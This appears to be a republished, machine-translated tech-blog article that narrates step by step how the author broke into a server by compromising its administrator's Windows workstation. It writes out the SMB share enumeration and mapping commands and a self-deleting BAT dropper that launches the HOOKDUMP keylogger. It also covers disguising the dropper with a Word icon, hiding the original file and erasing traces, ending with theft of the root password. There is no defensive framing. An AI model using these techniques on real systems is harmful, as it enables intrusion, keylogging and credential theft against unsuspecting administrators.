Shulou(Shulou.com)06/01 Report--

Xiaobian to share with you how hackers invade Linux system, I believe most people still do not know how, so share this article for everyone's reference, I hope you have a lot of harvest after reading this article, let's go to understand it together!

I found a Web site, so I went into it routinely. Good, its FINGER is open, so I made up a SHELL, aaa account tried to zzz(by the way, this is an online rule I found, that is, the length of the account is directly proportional to the strength of the password, if an account is only two or three digits long, then its password is generally very simple, and vice versa, so it is called Ruo's theorem), the result of an account does not exist, I did not try its account. Because I was attracted by the port it opened, it opened WWW, I do not believe that it does not make mistakes. I took five CGI and WWW scanners in a row and scanned a total of 300 or 400 common errors. It almost doesn't exist. Let's take a look at the root information:

finger root@xxx.xxx.xxx

Login name: root In real life: system PRIVILEGED account

Directory: / Shell: /bin/sh

Last login Fri Jul 28 09:21 on ttyp0 from 202.xx.xx.xx

No Plan.

Root often comes, that 202.xx.xx.xx is the workstation he uses, can you see something from there?

net view \202.xx.xx.xx

Shared resources at \202.xx.xx.xx

Sharename Type Comment

x

x

my briefcase

The command was completed successfully.

Windows '"File and Printer Sharing" service is open on the Internet machine, which is easy for many people to take lightly. This root is no exception. If its C drive shared and writable that good, but that is a dream, now open a shared directory is not a root directory, even D drive are not. Take your time. Take your time. X dropped those folders are useless, can not write, which is full of some English original, this root is quite good. "My Briefcase" caught my attention. It's a tool for synchronizing data on different machines. Obviously, the root has to update the home page on the host frequently, sometimes on his own machine, sometimes on the host…so it's important to note that sharing "My Briefcase" is generally writable!

Then I'll go back in and have a look.

>net use i: \202.xx.xx.xx

>i:

>echo asdf>temp.txt

Yes, indeed, it is.

>del temp.txt

Leave no trace--hacker habit.

>dir/od/p

Look at what's in there... what's in the second row from the bottom? "X Month Work Plan.doc"! That's it. Since it's a plan, it's impossible to throw it aside after writing it. It will definitely open it again--at least COPY it when writing the plan next month:->

page

It's time to do it. My goal is to get it to open again and miss my trap and run my Trojan horse. This time I used a keyboard recording software HOOKDUMP, I think it is very good, affordable price, the amount is also sufficient…Sorry, say used to it, it should not only record all the keystrokes, but also record what programs are opened or closed, what buttons have been pressed, what menus have been used…In short, its record allows you to stand behind him and watch him operate the computer as detailed. Why do you want to ask so many Trojan horses? Whether it is China's ice river, netspy or foreign netbus, BO, are listed as the number one detection target by various anti-virus software, and a root machine can not be installed anti-virus software? HOOKDUMP is still good, small, inconspicuous, but if everyone uses it, I'm afraid I'll have less chance to use it again…

>copy hookdump.* i:

Add a point: upload before the first compilation of its hookdump.ini file, set to hide the way to run, or root a run screen pop up a large window can be…

Then compile a BAT file with the same name on your machine: X Month Work Plan.BAT

>edit c:X month work plan.BAT

@echo off

hookdump

attrib -h X month work plan.doc

C:Program FilesMicrosoft OfficeWinword X Monthly Work Plan.doc

attrib -h temp.bat

del temp.pif

del temp.bat

Do you understand? Root runs this BAT file is actually running the Trojan first, and then calls the WINWORD file to open the file it wants to open, and then self-delete, maybe it WINWORD on the machine location is different, that call will fail, but it does not matter, anyway BAT will be deleted immediately, he will think it is his own misoperation.

Then your C drive root directory has such a BAT file, it is a square icon, and that WORD file is very different, how can root run it? It doesn't matter. Right click on this file, click Properties, and select "Change Icon" in the "Program" column. Isn't that enough? The icon for Word is in your C:Program Files Microsoft Office. Also change "Run" to "Minimize" and check "Close on Exit" to ensure that there is no sign at all when running. In fact, this BAT file becomes two, and a PIF file is its icon.

Send these two documents:

>copy X month work plan.bat i:

>copy X month work plan.pif i:

Then hide his files and his own files:

>attrib +h X Monthly Work Plan.doc

>attrib +h X monthly work plan.bat

In this way, root's "briefcase" only has a WORD icon identical to the original, which he never dreamed had become a BAT file. Then we can catch our breath and wait quietly…

A few days later, I went into the workstation, took down the keystroke log, found the root password, and entered the mainframe.

That's all for "How Hackers Hack Linux", thanks for reading! I believe that everyone has a certain understanding, hope to share the content to help everyone, if you still want to learn more knowledge, welcome to pay attention to the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.